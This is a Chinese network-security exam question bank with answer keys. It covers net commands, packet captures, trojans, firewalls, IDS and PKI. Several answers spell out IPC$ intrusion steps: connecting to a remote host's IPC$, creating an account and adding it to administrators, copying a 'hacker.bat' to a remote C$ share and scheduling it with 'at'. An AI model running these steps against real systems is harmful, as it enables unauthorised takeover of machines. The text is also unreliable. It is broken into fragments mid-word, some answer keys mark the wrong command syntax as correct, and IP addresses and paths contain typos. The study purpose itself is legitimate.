网络安全技术真题精选.docx

1、网络安全技术真题精选2019年网络安全技术真题精选单项选择题1、删除账号stu的命令是（）（密码是123）。A.net user 123 stuB.net user 123 stu /delC.net use 123 stu /delD.net user stu 123 /del参考答案：B单项选择题2、net view命令查看的是 （）。A.所有共享B.特殊共享C.默认共享D.普通共享参考答案：D填空题3 IPC攻击是黑客常用的攻击方式，但需要复杂的连接和操作控制，例如查看目标机的共享情况、建立帐号、留下后面程序等等，请回答ipc攻击的以下步骤操作？ 1)建立空ipc$连接的命令。 2)在本

2、机用net user命令建立帐号：s1,并加入administrators组的过程。 3)查看远程主机 192.168.11.222的时间命令 4)映射远程主机192.168.11.6主机上C盘为本机Z:的命令 5)写出删除本机ipc$的命令参考答案： 、net use /192.168.11.1/ipc$ “password” /user:”admin”、net user s1 123 /addnet localgroup administrators s1 /add、net time 192.168.11.1、net use z：/192.168.11.6/c$、net share ipc

3、$ /del 单项选择题4、建立共享成功的必要条件条件是（）。A.开放server服务B.开放Taskscheduler服务C.开启Guest账号D.开放远程管理服务参考答案：A填空题5 下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。 在TCP的6比特的控制字段中：SYN的含义是（）。SYN，ACK的含义是（）。ACK的含义是（）。参考答案：请求建立TCP连接；可以建立连接；确认单项选择题6、DDOS是（）攻击。A.远程攻击B.分布式拒绝服务C.请求拒绝D.溢出攻击参考答案：B填空题7 下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。 客户机向服务器请

4、求建立TCP连接的数据包的号数是（）。参考答案：1单项选择题8、木马是采用（）来控制远程机器的（c=Client s=Server）。A.c控制sB.s控制cC.c控制cD.s控制s参考答案：A填空题9 下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。 客户机访问服务器使用的传输层协议是（），应用层协议是（）。参考答案：TCP；HTTP单项选择题10、木马是（）软件。A.远程控制B.病毒软件C.恶意软件D.邮件参考答案：A填空题11 下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。 Web服务器的IP地址是（），它属于（）地址。参考答案：202.203.

5、208.32；公网单项选择题12、冰河是（）木马。A.第一代B.第二代C.第三代D.第四代参考答案：B填空题13 下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。 客户机的IP地址是（），它属于（）地址。参考答案：192.168.0.103；私网单项选择题14、灰鸽子是（）木马。A.第一代木马B.第二代木马C.第三代木马D.第四代木马参考答案：C填空题15简述主动连接的过程。参考答案： 服务端开放监听端口，等待连接。客户端（控制端）发出建立连接请求服务端同意连接，成功建立连接 单项选择题16、木马的最主要功能是（）。A.入侵B.远程控制C.伪装D.隐蔽参考答案：B填空题17

6、在本机用net user命令建立帐号：s1，并加入administrator组的过程。参考答案： net user s1 123 /addnet localgroup administrators s1 /add 单项选择题18、widows操作系统和硬件信息存在在注册表的（）。A.HKEY_CLASSES_ROOTB.HKEY_CURRENT_CONFIGC.HKEY_CURRENT-USERD.HKEY_LOCAL_MACHE参考答案：D填空题19将当前目录下hancker.bat文件拷贝到远程机器192.168.11.1里C盘的命令是什么？参考答案：copy hacker.bat /19

7、2.169.11.1/c$单项选择题20、要能够进行远程注册表攻击必须（）。A.开启目标机的service的服务B.开启目标机的Remote Registy Service服务C.开启目标机的Server服务D.开启目标机的Remote Routig服务参考答案：B填空题21 下图第四步传输什么内容： 参考答案： 前三步是三次握手过程，第四步是请求的具体内容，比如网页，前三步是为第四步服务的。更多内容请访问睦霖题库微信公众号单项选择题22、windows 有一个自带的管理telnet工具，该工具是（）A.tlntadmnB.telnetC.instsrvD.system32参考答案：A填空题2

8、3 在校园的局域网中捕获到一个以太网帧，此帧的全部数据如下图所示. 此帧中封装的上层协议是（）协议。参考答案：ARP单项选择题24、删除amdin$的命令是（）。A.net share admin$B.net share admin$=c：/windows /delC.net share admin$ /delD.net use admin$ /del参考答案：C填空题25 在校园的局域网中捕获到一个以太网帧，此帧的全部数据如下图所示. 它的源IP地址是（），它属于（）IP地址。参考答案：10.0.26.12；私网单项选择题26、创建d：/sun共享的命令是（）。A.net share su=

9、d:/sun /unlimitB.net use su=d：/sun /unlimitC.net user su=d：/sun /unlimitD.net share su= /sun /unlimit参考答案：A填空题27 在校园的局域网中捕获到一个以太网帧，此帧的全部数据如下图所示. 此的源物理地址是（）。参考答案：00:16:76:0e:b8:76单项选择题28、建立账号stu的命令是（）（密码是123）。A.net user 123 stuB.net user 123 stu /addC.net use 123 stu /addD.net user stu 123 /add参考答案：B

10、填空题29 在校园的局域网中捕获到一个以太网帧，此帧的全部数据如下图所示. 它的目的IP地址是（），它属于（）地址。参考答案：10.0.26.1；单播单项选择题30、amdin$对应的目录是（）（系统在D盘）。A.d：/windows/system32B.d：/windowsC.d：/programfileD.d：/参考答案：B填空题31 在校园的局域网中捕获到一个以太网帧，此帧的全部数据如下图所示. 此帧的目的物理地址是 （），它属于（）地址。参考答案：ff:ff:ff:ff:ff:ff；广播单项选择题32、Sniffer是（）。A.扫描工具B.嗅探工具C.连接工具D.搜索工具参考答案：B填

11、空题33 在校园的局域网中捕获到一个以太网帧，此帧的全部数据如下图所示. 此帧的用途和目的是什么？参考答案： 地址解析协议的ARP查询。 单项选择题34、下列不是WINDOWS默认共享（）。A.C$B.IPC$C.ADMIN$D.WIN参考答案：D填空题35利用bat远程开启telnet服务。参考答案： 、建立ipc$连接，net use /192.168.17.2/ipc$ “123” /user:”zhangsan”、编写bat文件 tel.batnet start telnet、copy tel.bat /192.169.17.2/d$、net time 192.168.17.2(取得时

12、间t)、at /192.168.17.2 t+3 d:/tel.bat注意：这种方法开启的服务的启动方式不能为禁止 填空题36列举防火墙的几个基本功能？参考答案： （1）隔离不同的网络，限制安全问题的扩散，对安全集中管理，简化了安全管理的复杂程度。（2）防火墙可以方便地记录网络上的各种非法活动，监视网络的安全性，遇到紧急情况报警。（3）防火墙可以作为部署NAT的地点，利用NAT技术，将有限的IP地址动态或静态地与内部的IP地址对应起来，用来缓解地址空间短缺的问题或者隐藏内部网络的结构。（4）防火墙是审计和记录Internet使用费用的一个最佳地点。（5）防火墙也可以作为IPSec的平台。（6）

13、内容控制功能。根据数据内容进行控制，比如防火墙可以从电子邮件中过滤掉垃圾邮件，（7）可以过滤掉内部用户访问外部服务的图片信息。只有代理服务器和先进的过滤才能实现。 填空题37解释反弹技术参考答案： 设置中间代理客户端（控制端）向中间代理注册本机的最新ip客户端开放监听端口，等待连接。服务端从中间代理取得控制端的最新ip地址，并发出建立连接请求，客户端同意连接，成功建立连接 填空题38什么是IDS，它有哪些基本功能？参考答案： 入侵检测系统IDS，它从计算机网络系统中的若干关键点收集信息，并分析这些信息，检查网络中是否有违反安全策略的行为和遭到袭击的迹象。入侵检测被认为是防火墙之后的第二道安全闸

14、门。1）监测并分析用户和系统的活动，查找非法用户和合法用户的越权操作；2）核查系统配置和漏洞并提示管理员修补漏洞；3）评估系统关键资源和数据文件的完整性；4）识别已知的攻击行为，统计分析异常行为；5）操作系统日志管理，并识别违反安全策略的用户活动等。 填空题39开启远程机器 192.168.11.8上telnet服务的方法。参考答案： 建立ipc连接连接管理远程计算机即打开计算机管理操作连接到另一台计算机在服务栏下开启telnet服务，同时可以更改启动类型 填空题40说一说木马的防治方法？参考答案： 安装反病毒软件。时刻打开杀毒软件，大多数反病毒工具软件几乎都可检测到所有的特洛伊木马，但值得注

15、意的是，应及时更新反病毒软件。安装特洛伊木马删除软件。反病毒软件虽然能查出木马，但却不能将它从计算机上删除。为此必须安装诸如TROJIAREMOVER之类的软件。建立个人防火墙。当木马进入计算机时，防火墙可以对你进行有效保护。不要执行来历不明的软件和程序。木马的服务端程序只有在被执行后才会生效。通过网络下载的文件，QQ或MSN传输的文件，以及从别人那拷贝来的文件，对电子邮件附件在没有十足把握的情况下，千万不要将它打开。最好是在运行它之前，先用反病毒软件对它进行检查。 填空题41映射远程主机192.168.11.6主机上C盘为本机Z:的命令。参考答案： net use z: /192.168.1

16、1.6/c$ 。 填空题42为什么说在PKI中采用公钥技术的关键是如何确认某个人真正的公钥？如何确认？参考答案： 信息的可认证性是信息安全的一个重要方面。认证的目的有两个：一个是验证信息发送者的真实性，确认他没有被冒充；另一个是验证信息的完整性，确认被验证的信息在传递或存储过程中没有被篡改、重组或延迟。在认证体制中，通常存在一个可信的第三方，用于仲裁、颁发证书和管理某些机密信息。公钥密码技术可以提供网络中信息安全的全面解决方案。采用公钥技术的关键是如何确认某个人真正的公钥。在PKI中，为了确保用户及他所持有密钥的正确性，公开密钥系统需要一个值得信赖而且独立的第三方机构充当认证中心（CA），来确

17、认声称拥有公开密钥的人的真正身份。要确认一个公共密钥，CA首先制作一张“数字证书”，它包含用户身份的部分信息及用户所持有的公开密钥，然后CA利用本身的私钥为数字证书加上数字签名。任何想发放自己公钥的用户，可以去认证中心（CA）申请自己的证书。CA中心在认证该人的真实身份后，颁发包含用户公钥的数字证书，它包含用户的真实身份、并证实用户公钥的有效期和作用范围（用于交换密钥还是数字签名）。其他用户只要能验证证书是真实的，并且信任颁发证书的CA，就可以确认用户的公钥。 填空题43在本机用net user命令建立帐号：s1，并加入administrator组的过程。参考答案： net user s1 1

18、23 /addnet localgroup administrators s1 /add 填空题44简述三次握手的过程。参考答案： 填空题45用IPC$入侵方法在远程主机192.168.11.1上建立一个帐号为STU2，并加入administrators过程。参考答案： 、net use /192.168.11.1/ipc$ “password” /user:”admin”、建立文件hacker.bat，其内容：net user s1 123 /addnet localgroup administrators stu /add、copy hacker.bat /192.169.11.1/c$、

19、net time /192.168.11.1(取得时间t)、at /192.168.11.1 t+3 c:/hacker.bat 填空题46 ping命令的结果一般根据网络和目标机器不同，而不同，以下三个图分别表示最常见的三种，请根据以下三图回答问题： 、图一表示ping的结果如何？ 、图二最有可能是什么原因造成？ 、图三的原因有哪些？参考答案： 、图一表示目标机畅通。、图二最有可能是不在线、关机或根本没有这样的机器。、图三的原因有硬件损坏或本机没有到达路由。 填空题47简述木马攻击的过程.参考答案： 配置生成服务端种植木马上线，一般由主动和自动上线两种控制操作，实现攻击者的意图 填空题48简

20、述NTLM的认证方式。参考答案： NTLM认证方式有：0：不使用NTLM身份验证。1：先尝试NTLM身份验证。如果失败，再使用passwd。2：只使用NTLM身份验证。 填空题49命令net use z: /192.168.11.6/c$ 成功执行的结果是什么？参考答案：该命令的成功执行结果是在本地机器上多出一个盘符Z，Z盘实质上就是远程机器的C盘，在本地对Z盘的操作就等于对远程机器C盘的操作。填空题50写出将D盘下student目录共享的命令，共享名为stu。参考答案： Net share stu=D:/ student /unlimited 填空题51 填写下表，写出下列服务的公认端口或功

21、能描述： 参考答案： 填空题52DDOS是（）。参考答案：分布式拒绝服务填空题53跳板的含义是（）。参考答案：木马攻击的中间机器填空题54灰鸽子采用自动上线时，可以实现外网控制外网、内网控制内网和（）。参考答案：外网控制内网填空题55在远程机器192.168.1.23上把帐号stu加入administrators组的net完整命令是net localgroup stu （）。参考答案：/add填空题56在本机用net工具建立帐号stu1完整命令是（）stu1 123 /add（密码是123）。参考答案：net user填空题57映射远程主机192.168.11.6 C盘为本机Z盘的完整命令是net use（）/192.168.11.6/c$参考答案：z:填空题58windows系统自带的telnet服务可执行文件的完整路径是（）。参考答案：c;/windows/system32/tlntsvr.exe填空题59彩衣的目的是（）。参考答案：逃避杀毒软件的查杀填空题60命令（）打开微软控制台。参考答案：mmc